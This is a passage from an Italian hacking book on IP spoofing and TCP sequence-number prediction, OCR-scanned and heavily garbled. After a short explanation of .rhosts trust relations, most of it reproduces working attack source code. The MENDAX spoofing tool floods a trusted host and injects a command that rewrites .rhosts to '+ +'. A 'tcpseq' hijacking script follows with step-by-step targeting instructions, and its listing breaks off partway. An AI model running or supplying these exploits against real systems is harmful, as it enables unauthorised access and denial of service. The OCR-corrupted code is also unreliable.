inviare comandi particolari senza richiedere un autenticazione. 

La comodità di queste definizioni è soltanto legata al fatto che gli utenti non devono ridigitare 
la password tutte le volte anche se poi di fatto questo tipo di gestione crea anche dei problemi 
di sicurezza. 

All'interno dei sistemi operativi Unix esiste un file e precisamente : 



che può essere utilizzato dal sysadmin per la creazione di host trusted. 

Se un utente tenta di eseguire il login ad un account presente da un sistema che è listato in 

questo file, gli verà permesso l'accesso senza nessuna richiesta di password. 

Un file il cui scopo è simile a quello appena visto è : 

.rhosts 



Al contrario del file precedente questo permette l'accesso solo a combinazioni di user/host 
particolari. 

Ogni utente può creare nella sua home directory il suo file .rhosts personale. 

A causa dei problemi di sicurezza che può causare questo file, su molti sistemi questo è 

disabilitato. 

Un comando del seguente tipo in un sistema con relazioni trust estenderà questa relazione a 
qualsiasi host in rete. 



Un pacchetto legato all'attività di spoofing è quello per ambiente Linux denominato MENDAX. 

// main. c 

^include <std±o.h> 
^include <stdl±b.h> 
iinclude <string .h> 
^include <unistd.h> 
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^include <fcntl.h> 



^include <sys/types .h> 
iinclude <sys/socket . h> 
iinclude <sys/t±me . h> 

iinclude <net/±f . h> 
iinclude <arpa/±net.h> 

iifdef NIT 
iinclude "dnlt.h" 
iinclude <net/n±t_±f . h> 
#endl f 

iinclude "mendax . h" 
iinclude "packet . h " 



#lfndef NIT 

i deflne send_pak (a, b, c) send_pak ( (a) , (b) ) 
tiendif 



tiifdef NIT 
char ether[6]; 
tendi f 

char *progname; 

char Packet [PACKETSIZE] ; 

unslgned long our_seq, target_seq; 



tiifdef NIT 
Nit *nltfd; 
iendlf 



extern char *optarg; 

extern int optlnd, opterr, optopt; 

usage () 
{ 

fprlntf (stderr, "Usage : 

[ <gateway> ] \n \n ", progname) ; 

fprlntf (stderr, " -p PORT 

fprlntf (stderr, " -s PORT 

fprlntf (stderr, " -1 USERNAME 

fprlntf (stderr, " -r USERNAME 

fprlntf (stderr, " -c COMMAND 

fprlntf (stderr , " -w PORT 
PORT\n ") ; 

fprlntf (stderr, " -d 

fprlntf (stderr, " -t 

fprlntf (stderr, " -L TERM 

fprlntf (stderr, " -S PORT 
numbers . \n") ; 

return (0) ; 

} 



%s [OPTIONS] <source> <target> 

first port on localhost to occupy\n") ; 
server port on <source> to swamp\n") ; 
user on <source> \n ") ; 
user on <target>\n") ; 
command to execute \n ") ; 

walt for a TCP SYN packet on port 

read data from stdln and send It . \n ") ; 
test whether attack mlght succeed\n") ; 
spoof rlogind instead of rshd. \n") ; 

port from whlch to s ampi e seq 



Exit (msg, ec) 
char *msg; 
int ec; 
{ 

fprlntf (stderr , "%s: %s\n", progname, msg); 
exit (ec) ; 

} 



flood_host(src, dst, pktcount, flags) 

struct sockaddr_in *src, *dst; 

int pktcount; 

unslgned char flags; 

{ 

int 1; 
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struct opacket pak; 
struct sockaddr_±n from=*src; 
static unsigned short ±p_±d = 0; 
unsigned long seq_num = 343289783; 
int pktlen; 

for(± = 0 ; i < pktcount; { 

from. s±n__port = htons (ntohs (front. s±n_port) + 1) ; 
pktlen = gen_tcp_pak (Spak, &from, dst, lp_ld++, 
seq_num, OL, 0, flags) ; 

seq_num += 64000; 

/* don't flre dem packets too fucklng fast */ 
usleep(lOOO) ; 

send_pak ( (char *) &pak, pktlen, ether) ; 
putchar ( ' . ' ) ; 

} 

putchar ( ' \n ' ) ; 

} 

/* if from->sln port == 0, we accept packets from any 

* port on the remote machine. 

* The same applles to port, except that It ' s our locai port. 
*/ 

tcp_reply (pak, bufsize, from, port, timeout, flags) 
char *pak; 

u_int bufsize, port; 
struct sockaddr_in *from; 
struct timeval *timeout; 
u_char flags; 
{ 

char *get_ip _pak () ; 
struct ip *ihdr; 
struct tcphdr *thdr; 
u_long pktlen; 
char *p; 

if ( (p=get_ip_pak (timeout, Spktlen) ) == NOLL) 
return (0) ; 

/* check whether our packet is bigger than our buffer. */ 
if (pktlen > bufsize) 
return (0) ; 

/* Yuk! I hate alignments . . . */ 
bcopy(p, pak, (int) pktlen); 

ihdr = (struct ip *) pak; 

thdr = (struct tcphdr *) (pak + ihdr->ip_hl * 4); 

/* bahh. . we only want TCP packets */ 
if (ihdr->ip_p != IPPROTO_TCP) 
return (0) ; 

/* those packets are not for us */ 
if (bcmp (&from->sin_addr, &ihdr->ip_src, 4)) 
return (0) ; 

if (from->sin port && thdr->th_sport != from->sin __port) 

return (0) ; 
if (port && thdr->th_dport != port) 

return (0) ; 
i f (thdr->th_ flags fi flags != flags) 

return (0) ; 
return ( (unsigned int) pktlen); 

} 

guess_ackseq(ackseq, from, pktcount) 
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unsigned long *ackseq; 
struct sockaddr_±n *from; 
unsigned pktcount; 
{ 

char *get_ip _pak () ; 
struct diffs { 

unsigned long diff; 

int cnt; 
} diff s [pktcount] ; 
int highdiff, highcnt; 
int n; 

time_t starttime; 
struct ip *ihdr; 
struct tcphdr *thdr; 
struct timeval timeout; 
unsigned long pktlen; 
unsigned long seqnum, acknum; 
long diff, olddiff; 
int i; 
char *pak; 

timeout .tv_sec = 1; 
timeout . tv_usec = 0; 
starttime = time (NULL) ; 

for (i=0; Kpktcount; diffs[i++].cnt=0); 
for(i = 0; i < pktcount; ) { 

i f ( (time (NULL) - starttime) > (time_t) WAIT) 
break; 

if(!tcp_reply(Packet, 1024, from, 0, Stimeout, TH_SYN / 

TH_ACK) ) 

continue; 
ihdr = (struct ip *) Packet; 

thdr = (struct tcphdr *) (Packet + ihdr->ip_hl * 4); 

if(±) { 

int n; 
int mt; 

olddiff = diff; 

diff = ntohl (thdr->th_seq) - seqnum; 

/* 

* record the different differences 
*/ 

for (mt=-l, n=0; n<pktcount; n++) { 
if (diffs [n] .cnt) { 

if (diffs [n] . diff==diff) diffs [n] . cnt++; 

mt=-l; 

break; 
} else mt=i; 

} 

if (mt!=-l) { 

diffs [mt] . diff=diff; 
diffs [mt ] .cnt=l; 

} 

} 

seqnum = ntohl (thdr->th_seq) ; 
acknum = ntohl (thdr->th_ack) ; 

printf ("\nseq number: %lu, ack number: %lu", seqnum, acknum); 
if(i) 

printf (" difference: %ld", diff); 

tiifdef DEBUG 

hexdump (Packet, pktlen); 

tendi f 

i++; 

) 

puts("\n"); 

for (highdiff=highcnt=n=0; n<pktcount; n++) 
if (diffs[n].cnt>highcnt) ( 
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h±ghcnt=d±ffs[n] . cnt; 
highd±ff=d±ffs [n] . diff; 

} 

if (h±ghcnt<2) 

prlntf ("no detectable dlfference pattern. \n") ; 

else 

diff=highdiff; 

prlntf ( "uslng %ld as predlctlon dlfference (%d hit%s).\n", diff, 
highcnt, (highcnt==l) ? "": "s") ; 
*ackseq = seqnum + diff; 

} 

tcp_handshake (src, dst, myhost, sampleport) 
struct sockaddr_in *src, *dst, *myhost; 
u_short sampleport; 
{ 

struct opacket *pak; 
char *buf; 

u_short ip_id = 0x4189; 
u_short dstport; 
int 1; 

buf = (char *) malloc (sizeof (struct opacket) * (SAMPLEPACKETS + 1) + 

16); 

pak = (struct opacket *) buf; 
our_seq = 0; 

dstport = ntohs (dst->sin _port) ; 
dst->sin _port = htons (sampleport) ; 

/* Generate TCP SYN packets with myhost ' s source address */ 
for (i = 0; 1 < SAMPLEPACKETS; i ++) { 

gen_tcp__pak (pak++ , myhost, dst, ip_id++, our_seq, OL, 0, 

TH_SYN) ; 

our_seq += 64000; 

myhost->sin_port = htons (ntohs (myhost->sin__port) + 1) ; 

} 

/* Generate TCP SYN packet with src's source address */ 
our_seq = 0; 

dst->sin_port = htons (dstport) ; 

gen_tcp_pak (pak, src, dst, ip_id++, our_seq, OL, 0, TH_SYN) ; 

pak = (struct opacket *) buf; 

tiifndef NIT 

sock_open () ; 

tendi f 

/* Send packets */ 

for (i = 0; 1 < SAMPLEPACKETS + 1; 1++) { 

send_pak ( ( char *) pak, sizeof (struct ip) + 
sizeof (struct tcphdr) , ether) ; 

pak++; 

} 

/* Calculate next possible sequence number */ 
tiifndef TEST 

dstport = ntohs (dst->sin _port) ; 
dst->sin _port = htons (sampleport) ; 
guess_ackseq(&target_seq, dst, SAMPLEPACKETS) ; 
dst->sin __port = htons (dstport) ; 

Itendif 

/* acknowledge dst ' s sequence number */ 
pak = (struct opacket *) buf; 

gen_tcp_pak (pak, src, dst, ip_id++, our_seq, ++target_seq, 0, TH_SYN / 
TH_ACK) ; 

send _pak((char *) pak, sizeof (struct ip) + 
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free (buf) ; 

} 

/* When rshd is spoofed, 'data ' has to point to command to be 

* executed . For spooflng rloglnd, 'data ' polnts to the 

* terminal type. 
*/ 

spoof_rservice (src, dst, remuser, locuser, tenti, data) 

struct sockaddr_±n *src, *dst; 

char *remuser, *locuser, *term, *data; 

{ 

int slen; 

char *string, *sptr; 

±f((string = malloc (256) ) == NULL) 
return (-1) ; 

bzero (string, 256); 
sptr = string; 

slen = strlen (data) + strlen (remuser) + 

strlen (locuser) ; 
iffterm != NULL) 

slen += strlen (term) + 1; 

/* for rloglnd */ 

if (ntohs (dst->sin __port) == 513) { 
sptr += 1; 
slen += 4; 

} 

/* for rshd */ 

if (ntohs (dst->sin __port) == 514) { 
sptr += 2; 
slen += 5; 

} 

/* build data string and send it to r-service */ 

bcopy (remuser, sptr, strlen (remuser) + 1) ; 

sptr += strlen (remuser) + 1; 

bcopy (locuser , sptr, strlen (locuser) + 1) ; 

sptr += strlen (locuser) + 1; 

iffterm .'= NULL) { 

bcopy (term, sptr, strlen (term) + 1) ; 

sptr += strlen (term) + 1; 

} 

bcopy (data, sptr, strlen (data) + 1) ; 
bzero (Packet , PACKETSIZE) ; 

bcopy (string, Packet + sizeof (struct opacket) , slen); 
gen_tcp_pak ( (struct opacket *) Packet, src, dst, 64, our_seq, 

target_seq, slen, TH_ACK / TH_PUSH) ; 
send_pak (Packet , sizeof (struct ip) + 

sizeof (struct tcphdr) + slen, ether) ; 
our_seq += slen; 

free (string) ; 

} 

/* returns value !=0 on success */ 

test_host (src, dst, myhost) 

struct sockaddr_in src, dst, myhost; 

{ 

time_t starttime; 
struct timeval timeout; 
unsigned int flag = 0; 
unsigned int pktlen; 

timeout .tv_sec = 1; 
timeout. t V _usec = 0; 
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printf ( "sending initial syn packet : ") ; 
tiifndef NIT 

sock_open () ; 

tiendif 

flood_host (Smyhost , &dst, 1, TH_SYN) ; 
starttime = tinte (NULL) ; 

while(t±me(NULL) - starttime < WAIT) { 
if ( (pktlen = (unsigned int) 

tcp_reply (Packet, 1024, &dst, 
0, Stimeout, TH_SYN I TH_ACK) ) ) { 
flag++; 
break; 

} 

} 

if(lflag) { 

printf ("warning: initial syn packet was not ack'd.\n"); 
return (0) ; 

} 

flood_host (&src, &dst, FLOODPACKETS , TH_SYN) ; 
printf ( "flooding host with bogus packet s : ") ; 
flood_host (Smyhost, &dst, 1, TH_SYN) ; 
flag = 0; 

starttime = t ime (NULL) ; 

while (time (NULL) - starttime < WAIT) { 
i f ( (pktlen = (unsigned int) 

tcp_reply (Packet, 1024, &dst, 
0, Stimeout, TH_SYN I TH_ACK) ) ) { 
flag++; 
break; 

} 

} 

iifndef NIT 

sock_close () ; 

tendi f 

hexdump (Packet, pktlen) ; 
printf ( "resetting host : ") ; 

flood_host (&src, &dst, FLOODPACKETS, TH_RST) ; 
return ( ! flag) ; 

} 

send_data (src, dst) 

struct sockaddr_in *src, *dst; 

{ 

FILE *in; 

char stringi 256] ; 

int slen, tbytes = 0; 

while (fgets (st ring, 256, stdin) != NULL) { 
slen = strlen (string) ; 

bcopy (string, Packet + sizeof (struct opacket) , slen); 

gen_tcp__pak ( (struct opacket *) Packet, src, dst, 64, our_seq, 

target_seq, slen, TH_ACK / TH_PUSH) ; 
send_pak (Packet , sizeof (struct ip) + 

sizeof (struct tcphdr) + slen, ether) ; 
our_seq += slen; 

/* dunno whether this will work. . . */ 
target_seq += tbytes; 
tbytes = slen; 

} 

return (0) ; 

} 

main (argc, argv) 
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char * *argv; 






{ 

struct sockaddr_±n src, dst, myhost, gw, evll; 






struct timeval timeout; 






unsigned short myport = 7843, 






remoteport = 514, 






serverport = 513, 






waitport = 0, 






sampleport = 514; 






unsigned int eh, tflag = 0, 












dflag = 0, 






Lflag = 0; 






char hostname [256] , 






string[256] , 






*sptr; 






char *locuser, *remuser, *command, *term = NULL; 






progname = argv[0] ; 






fc im^ouf" tv Gt&r 1 — 7 ■ 






timeout . tv_usec = 0; 






command = "mv . rhosts . r; echo + + > . 


rhosts "; 




remuser = 






locuser = "root "; 






gethostname (hostname , 255) ; 






if (resolve_host (EVILSITE, &evil) < 0) 






E* v 7 4- ( " fa n t~> t~o ero 7 tt"0 a ri ri t~o cr cr io -F JPX/TT.QT^TP " 

CiAl L. ( L.UÌJ1ÌU (_ X CO _L Ve CluUX COS L^X i-J V -L J-IkJ X X Hi . f 


1 ì ■ 




if (resolve_host (hostname, Smyhost) < 0) 






Exit("cannot resolve address of localhost . " 


, i); 




tiifdef NIT 






if (resolve_host (GATEWAY, &gw) < 0) 






Exitf'cannot resolve address of GATEWAY.", 


i); 




iendif 






while((ch = getopt(argc, argv, "c : dg: 1 :p : r : s : tw: L 


:S:")) '■ = 


-1) { 


switch(ch) ( 






case ' c ' : 






command = optarg; 






break; 






case 'd': 






dflag++; 






break; 






tiifdef NIT 






case 'g': 






if (resolve_host (optarg, &gw) 


< 0) 




Exit("cannot resolve address of 


GATEWAY. ", 


i); 






break; 






tendi f 






case '1': 






locuser = optarg; 






break; 






case 'p ' : 






myport = atoi (optarg) ; 






break; 






case 'r': 






remuser = optarg; 






break; 






case ' s ' : 






serverport = atoi (optarg) ; 






break; 






case ' t ' : 






tflag++; 






break; 






case ' w ' : 
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waltport = atol (optarg) ; 

break; 
case 'L' : 

tenti = optarg; 

break; 
case 'S': 

sampleport = atol (optarg) ; 

break; 
case ' ? ' : 
default : 

usage() ; 

exit(l); 

} 

ì 

If (argc - optlnd !=2) { 
usage () ; 
exit (1) ; 

} 

if (term == NULL) 

remoteport = 514; 

else 

remoteport = 513; 

if (resolve_host (argv[optind++] , &src) < 0) 

Exit ( " cannot resolve ho striarne . " , 1) ; 
If (resolve_host (argv[optlnd++] , &dst) < 0) 

Exit ("cannot resolve hostname . " , 1) ; 

src.sin__port = htons (serverport) ; 
dst.sin_port = htons (remoteport) ; 
myhost . sin _port = htons (myport) ; 

evil.sin __port= htons (200) ; 

tiifdef NIT 

if (arp (&gw. sin_addr, ether) < 0) 

Exit ("arp failed for gateway . gateway not on locai subnet ?", 

U; 

if ((nitfd = NitOpen("leO", NIT_BUFFER, 0, timeout, 
NI_ TIMESTAMP / NI_DROPS / NI_LEN) ) == NULL) 
Exit ("cannot initialize /dev/nit . " , 1) ; 

iendif 

if(tflag) { 

dst . sin __port = htons (sampleport) ; 
if ( !test_host (src, dst, myhost)) 

printf ( "attack will probably fail.\n"); 

else 

printf ("host seems to be unprotected from this 

attack. \n") ; 

exit (0) ; 

) 

iifndef NOFLOOD 

/* flood source host with TCP SYN packets */ 

printf ("flooding source with TCP SYN packets from %s : ", EVILSITE) ; 
flood_host (Sevil, &src, FLOODPACKETS , TH_SYN) ; 

tendi f 

/* send TCP SYN packets to target. Calculate the difference 

of the sequence numbers in the received TCP SYN/ACK packets . 
The last packet ' s source address is the address of the 
host we want to impersonate . . . Then acknowledge TCP SYN/ACK 
packet with the sequence number we guessed */ 

printf ( "sampling sequence numbers. . . \n") ; 
tcp_handshake (&src, &dst, Smyhost, sampleport) ; 
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±f(term == NULL) { 

prlntf ("spooflng rshd. \n") ; 

spoof_rservice (&src, &dst, remuser, locuser, NULL, command); 

} 

else { 

prlntf ("spooflng rloglnd. \n") ; 

spoof_rservlce (&src, &dst, remuser, locuser, tenti, command); 

} 

If(wflag) { 

tlme_t starttlme; 
unslgned Int flag = 0; 
unslgned Int pktlen; 

starttlme = tlme(NULL); 
dst . sin __port = 0; 

whlle (tlme (NULL) - starttlme < WAIT) { 
1 f ( (pktlen = (unslgned Int) 

tcp_reply (Packet, 1024, &dst, 
waltport, Stimeout, TH_SYN) ) ) { 
flag++; 
break; 

} 

) 

hexdump (Packet, pktlen); 

dst . sin __port = htons (remoteport) ; 

If(flag) { 

prlntf ( "spooflng seemed to be success f ul . \n") ; 
sleep(l) ; 

} 

else 

prlntf ("No TCP packet recelved wlthln timeout 

perlod. \n") ; 

) 

else 

sleep(3) ; 

If(dflag) 
{ 

prlntf ("ready to send data. . . \n") ; 
send_data (&src, &dst) ; 
sleep(3) ; 

} 

/* Resetting connection */ 

prlntf ("resetting TCP target connection: .\n"); 
gen_tcp_pak (Packet, &src, &dst, 128, our_seq, 

target_seq, 0, TH_RST) ; 
send _pak (Packet, sizeof (struct ip) + 

sizeof (struct tcphdr) , ether) ; 

tiifndef NOFLOOD 

/* Reset source host's serverport using TCP RST packet s . 
We don't want to wait for a timeout, do we ? */ 

prlntf ( "resetting source: "); 

flood_host (Sevil, &src, FLOODPACKETS , TH_RST) ; 

iendif 

iifdef NIT 

NitClose (nitfd) ; 

tendi f 

exit (0) ; 

} 



Lo spoofing può essere comqunue applicato a diversi sistemi legati ad internet come ad 
esempio DNS, mail ecc. 
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I P Spoof ing e predizione del numero di sequenza TCP 

In altri capitoli abbiamo visto i formati dei pacchetti relativi ai vari protocolli. 

Una cosa che sicuramente è stata notata è relativa al fatto che quasi tutti i tipi possedevano 

al loro interno gli indirizzi relativi a chi inviava i pacchetti e a chi li doveva ricevere. 

Di questo abbiamo parlato anche nel capitolo precedente ma in questo però non abbiamo 

fatto cenno al fatto che nelle comunicazioni tra due sistemi una cosa importantissima è quello 

che viene definito come numero di sequenza nell'ambito delle funzioni di scambio tra questi. 

Quando abbiamo visto i vari protocolli avevamo detto che quando un sistema richiede ad un 

server una comunicazione questo inizializza un numero che verrà utilizzato come numero 

sequenziale dei pacchetti. 

Ogni volta che un sistema risponde ad una certa richiesta incrementa questo numero di un 
unità e utilizza questo numero all'interno dell'apposito campo dell'header del pacchetto. 
Le operazioni di spoofing possiedono come complicazione massima quella di riuscire ad 
individuare questo numero al fine di fare accettare ai servers i pacchetti inviati con indirizzi 
falsificati. 

Molte trattazioni sono state fatte in merito. 

Molte si basano sull'individuazione del sistema operativo in quanto in base a questo 
avvengono determinate scelte iniziali. 

Allo stesso modo delle molte teorie esistono anche un gran numero di programmi che 
cercano di aiutare ad identificare questo numero sequenziale. 
Un di questi è quello che segue : 

/* 

* 

* TCP Sequence Number Predictlon Script 
* 

* Complllng: 

* Under Solaris try: 

* gcc tcpseq.c -lsocket -lnsl -L/usr/ucbllb -lucb 

* If that doesn ' t work, use : 

* gcc -o tcpseq tcpseq. c 

* 

* This script will hljack a TCP connection 

* using TCP Sequence Number Predictlon . 

* Script Usage: 

* tcpseq <trusted> <target> 

* 

* For people who know nothlng of this 

* exploit, here's how an attack might be 

* launched. 
* 

* X is the Attacker 

* T is the Target 

* C is a system the Target trusts. 
* 

* First, issue this command: 

* finger -1 @x 

* If the target machine has finger enabled, 

* you should get basic information such as 

* logged in users and current connections . 

* If there are no connections, then try 

* issuing this RPC (Remote Procedure Cali) 

* on the target machine: 

* showmount -e 

* This command, if success fui, will teli 

* you what systems have a trust between 

* them. Pick one at random. That will be 

* C; the system the target trusts. 

* If this doesn 't work, but the target 

* machine has current connections , then 

* pick one of the systems connected. 

* That will be the new target . Do the 

* same thing with that machine. Once 

* you know the system the target machine 
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* tcpseq <c> <t> 

* You have a 90% chance of success. 

* 

* This script has been brought to you by: 
* 

* ..;:/■ GoD <god@mayo± . org> ] 

* 

V 



^include <stdio.h> 
^include <sys/types.h> 
^include <sys/socket . h> 
# include <netinet/in_systm.h> 
^include <netinet/in . h> 
^include <net/if.h> 
^include <netinet/ip.h> 
iifdef sun 

iinclude <netinet/tcp.h> 
#else /* Linux */ 
iinclude <netinet/ip_tcp . h> 
tendif 

# include <errno.h> 
iinclude <netdb.h> 



iifdef sun 
struct iphdr { 

u_char version: 4 , 
ini: 4; 

u_char tos; 

short tot_len; 

u_short id; 

short frag_off; 

u_char ttl; 

u_char protocol; 

u_short check; 

unsigned long saddr, daddr; 

}; 

tendi f 



/* version */ 
/* header length */ 
/* type of servi ce */ 

/* total length */ 
/* Identification */ 

/* fragment offset field */ 
/* tinte to live */ 

/* protocol */ 
/* checksum */ 
/* source and dest address */ 



* Pinched from ping. c 



* in_cksum — 

* Checksum routine for Internet Protocol family headers (C Version) 
*/ 

unsigned short in_cksum (addr, len) 
u_short *addr; 
int len; 

{ 

register int nleft = len; 
register u_short *w = addr; 
register int sum = 0; 
u_short answer = 0; 

/* 

* Our algorithm is simple, using a 32 bit accumulator (sum) , we add 

* sequential 16 bit words to it, and at the end, fold back ali the 

* carry bits from the top 16 bits into the lower 16 bits . 
*/ 

while (nleft > 1) ( 
sum += *w++; 
nleft -= 2; 

} 



/* mop up an odd byte, if necessary */ 
if (nleft == 1) { 

*(u_char *) (Sanswer) = * (u_char *)w 
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sum += answer; 

} 

/* add back carry outs from top 16 bits to low 16 blts */ 
sum = (sum » 16) + (sum & Oxffff); /* add hi 16 to low 16 */ 
sum += (sum » 16); /* add carry */ 

answer = ~sum; /* truncate to 16 blts */ 

return (answer) ; 

; 

Inllne void prlnttcppacket (Int r, char *buf, struct sockaddr_ln *addr) 
{ 

struct iphdr *ip; 
struct tcphdr *tcp; 
Int len=-l; 

printf (" 

\ n n ); 

/* IP */ 

prlntf ("Packet Slze = %d\n",r); 

addr->sln_addr. s_addr = ntohl (addr->sln_addr. s_addr) ; 

ip = (struct iphdr *) buf; 

len = ip->ihl « 2; 
printf ( "IP Header\n ") ; 
printff" \n") ; 

printf ("length %d, version %d\n" , len, ip->version) ; 
printf ("tos %d, tot_len %d\n" , ip->tos, ntohs (ip->tot_len) ) ; 
printf ("id %d, frag_off %d, ttl %d, protocol %d\n" , ntohs (ip- 
>id) , ntohs (ip->frag_off) , 

ip->ttl, ip->protocol) ; 
printf ( "check %d\n ", ntohs (ip->check) ) ; 
printf ( "IPFrom %s, ", inet_ntoa (ip->saddr) ) ; 
printf ( "IPTo %s \n ", inet_ntoa (ip->daddr) ) ; 

/* TCP */ 

tcp = (struct tcphdr *) (buf + len); 

printf ("TCP Header\n") ; 

printf (" ; 

printf ("SPort = %hu, DPort = %hu, SeqNum = %lu, AckNum = %lu\n", 

ntohs (tcp->th_sport) , ntohs (tcp->th_dport) , 

ntohl (tcp->th_seq) , ntohl (tcp->th_ack) ) ; 
printf ("x2 %d, off %d\n" , tcp->th_x2, tcp->th_off) ; 

printf ("Flags") ; 
if ( !tcp->th_ flags) 

printf (" none"); 

else { 

if (tcp->th_flags & TH_FIN) 

printf (" FIN") ; 
if (tcp->th_flags & TH_SYN) 

printf (" SYN") ; 
if (tcp->th_flags 4 TH_RST) 

printf (" RST") ; 
if (tcp->th_flags & TH_PUSH) 

printf (" PUSH"); 
if (tcp->th_flags & TH_ACK) 

printf (" ACK") ; 
if (tcp->th_flags & TH_URG) 

printf (" URG") ; 

} 

printf (". \n"); 

printf ("win %d, sum %d, urp %d\n" , ntohs (tcp->th_win) , ntohs (tcp- 
>th_sum) , ntohs (tcp->th_urp) ) ; 
} 

inline void gettcppacket (int s, char *buf, int size) 
i 
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struct sockaddr_ln addr; 
struct iphdr *ip; 
struct tcphdr *tcp; 
int lezi, r; 

lezi = slzeof (addr) ; 

if ( (r = recvfrom(s,buf, slze, 0, (struct sockaddr *) &addr, Slen) ) == -1) 
perror ( "recvf rozzi ") ; 

fprlntf (stderr, "errori recvf rom returzied %d\n",r); 
exit (1) ; 

} 

/* 

printtcppacket (r,buf, Saddr) ; 
*/ 



inline void sendtcppacket (int s, unsigned long src, unsigned long dest, 
struct sockaddr_in *addr, 

unsigned char flags, unsigned short sport, unsigned short dport, 
unsigned long seqnum, unsigned long acknum, char *data, int datalen) 

{ 

struct iphdr ip; 
struct tcphdr tcp; 
static char packet [4096] ; 
char tcpbuf [4096] ; 
char *ptr; 

unsigned short size=0; 

ip.ihl = 5; 
ip. ver sion = 4; 
ip.tos = 0; 

ip.tot_len = htons (40 + datalen) ; 
ip.id = htons (666+ (rand() %100) ) ; 
ip. frag_off = 0; 
ip.ttl = 255; 

ip. protocol = IPPROTO_TCP; 
ip . check = 0; 
ip . saddr = src; 
ip.daddr = dest; 

ip. check = in_cksum( (char *) &ip, sizeof (ip) ) ; 

tcp.th_sport = htons (sport) ; 
tcp.th_dport = htons (dport) ; 
tcp.th_seq = htonl (seqnuzn) ; 
tcp.th_ack = htonl (acknum) ; 
tcp.th_x2 = 0; 
tcp.th_off = 5; 
tcp .th_flags = flags; 
tcp.th_win = htons (10052) ; 
tcp.th_sum = 0; 
tcp.th_urp = 0; 

/* Add in a pseudo IP header */ 
memset (tcpbuf, 0, 4096) ; 
ptr = tcpbuf; 

memcpy (ptr, & (ip . saddr) , 8) ; /* Both saddr and daddr */ 
ptr += 9; /* Skip the 0 field */ 
memcpy (ptr, & (ip . protocol) , 1) ; 
ptr += 1; 

size = htons (datalen + sizeof (tcp) ) ; 
memcpy (ptr, & (size) , 2) ; 
ptr += 2; 

memcpy (ptr, Stop, sizeof (tcp) +datalen) ; 
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tcp.th_sum = in_cksum( (char *) tcpbuf, sizeof (tcp) +12+datalen) ; 

memcpy (packet, (char *) &ip, sizeof (ip) ) ; 

memcpy (packet+sizeof (ip) , (char *) &tcp, sizeof (tcp) ) ; 

memcpy (packet+sizeof (ip) +sizeof (tcp) , (char *) data, datalen) ; 

/* 

printtcppacket (sizeof (ip) +sizeof (tcp) +datalen , packet , addr) ; 

*/ 

if (sendto (s, packet, sizeof (ip) +sizeof (tcp) +datalen, 0, 

(struct sockaddr *)addr, sizeof (struct sockaddr_in) ) == -1) { 
perror ( "sendto") ; 
exit(l); 

} 

} 

void determine_sequence (int s, int r, unsigned long src, unsigned long dest, 
struct sockaddr_in *addr, 

unsigned long *next_seq, unsigned long *offset) 

{ 

struct iphdr *ip; 
struct tcphdr *tcp; 
int i, len; 

unsigned long start_seq=4321965+getpid() ; 
unsigned long start _port=600; 
char buf [4096]; 

unsigned long prev_seq=0 , diff=0; 
*offset=0; 

for (i=0; i<10; i++) { 

sendtcppacket (s, src, dest, addr, TH_SYN, start _port, 514, start_seq, 0, NULL, 0 

); 

for (;;) { 

gettcppacket (r, buf, sizeof (buf) ) ; 
ip = (struct iphdr *) buf; 
if (ip->saddr != dest) 
continue; 

/* 

printtcppacket (sizeof (buf) , buf, addr) ; 
*/ 

len = ip->ihl « 2; 
tcp = (struct tcphdr *) (buf+len) ; 
if (ntohs (tcp->th_dport) ==start _port && 
ntohs (tcp->th_sport) ==514) { 
if (prev_seq) { 

diff=tcp->th_seq-prev_seq; 

printf (" (prev=%u, new=%u, diff=%u\n", prev_seq, 
tcp->th_seq, diff) ; 

} else 

diff=0; 
if (*offset==0) 

*offset=diff; 
else { 

if (*offset!=diff) 

printf ("Diff erence in Offset: old=%u, new=%u\n", 
*offset, diff); 
*offset=diff; 

} 

prev_seq=tcp->th_seq; 
sendtcppacket (s, src, dest, addr, TH_RST, start _port++, 514, start_seq++, 0, NU 

LL, 0); 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



break; /* out of for loop */ 

} 

} 

ì 

*next_seq=prev_seq+*offset; 

} 

vold spoof (int s, unsigned long src, unslgned long dest, 
struct sockaddr_ln *addr, unslgned long next_seq) 

{ 

char buf[4096]; 
unsigned short port=513; 

/*char *string="0\Oroot\Oroot\Oecho + + »/ . rhosts\0" ; 
int stringlen=32 ; * / 

char *strlng="0\Okurt\Okurt\0/usr/bin/touch /tmp/spoof \0" ; 
Int stringlen=39; 
u_long seq=54378435; 
Int i; 

/* Send a syn with our own sequence number */ 

sendtcppacket (s, src, dest, addr, TH_ S YN, port, 514, seq, 0,NULL, 0) ; 
usleep(5000) ; /* wait for the other side to SYN, ACK */ 

sendtcppacket (s, src, dest, addr, TH_ACK,port, 514, seq, ++next_seq, NULL, 0) ; 

sendtcppacket (s, src, dest, addr, TH_ACK,port, 514, seq, next_seq, string, stri 

nglen) ; 

seq+=stringlen ; 

sleep(l) ; 

sendtcppacket (s, src, dest, addr, TH_FIN, port , 514, seq, next_seq, NULL, 0) ; 

for (i=l; i<4; i++) { 
sleep (2) ; 

sendtcppacket (s, src, dest, addr, TH_ACK,port, 514, seq+1 , next_seq+i , NULL, 0) 

ì 

usleep (50000) ; 

sendtcppacket (s, src, dest, addr, TH_RST, port , 514, seq+1 , next_seq+4 , NULL, 0) 

r 
ì 

void reset_trusted(int s, unsigned long src, unsigned long dest, 
struct sockaddr_in *addr, 

unsigned long seq_num[80] , unsigned long port_num[80] ) 

{ 

int i; 

for (i=0; i<80; i++) 

sendtcppacket (s, src, dest, addr, TH_RST,port_num[i ] , 513, seq_num[i ] , 0, NULL 
,0); ' 
} 

void hose_trusted (int s, unsigned long src, unsigned long dest, 
struct sockaddr_in *addr, 

unsigned long seq_num[80] , unsigned long port_num[80] ) 

{ 

int i; 

unsigned long start_seq=78156767+getpid () ; 
unsigned long start _port=600; 

for (i=0 ; i<80 ; i++) { 

port_num[i] =start _port++; 
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sendtcppacket (s, src, dest, addr, TH_SYN,port_num[l ] , 513, seq_num[l ] , 0 , NULL 

,0); 

ì 

} 



vold ma±n(±nt argc, char *argv[]) 
{ 



int ree, sen, 1=1; 
unsigned char buf [4096] ; 

struct sockaddr_in addr, trustedaddr, bogusaddr; 
char *bogusname = "19.17.14.17"; 

unsigned long dest, bogus, trusted, src, nseq, offset; 
struct hostent *host; 

unsigned long seq_num[80] , port_num[80] ; 

if (argc != 3) { 

fprintf (stderr, "Usage : %s trusted target\n" , argv[0] ) ; 
exit (1) ; 

} 



memset (Strustedaddr , 0, sizeof (trustedaddr) ) ; 
trustedaddr . sin_family = AF_INET; 

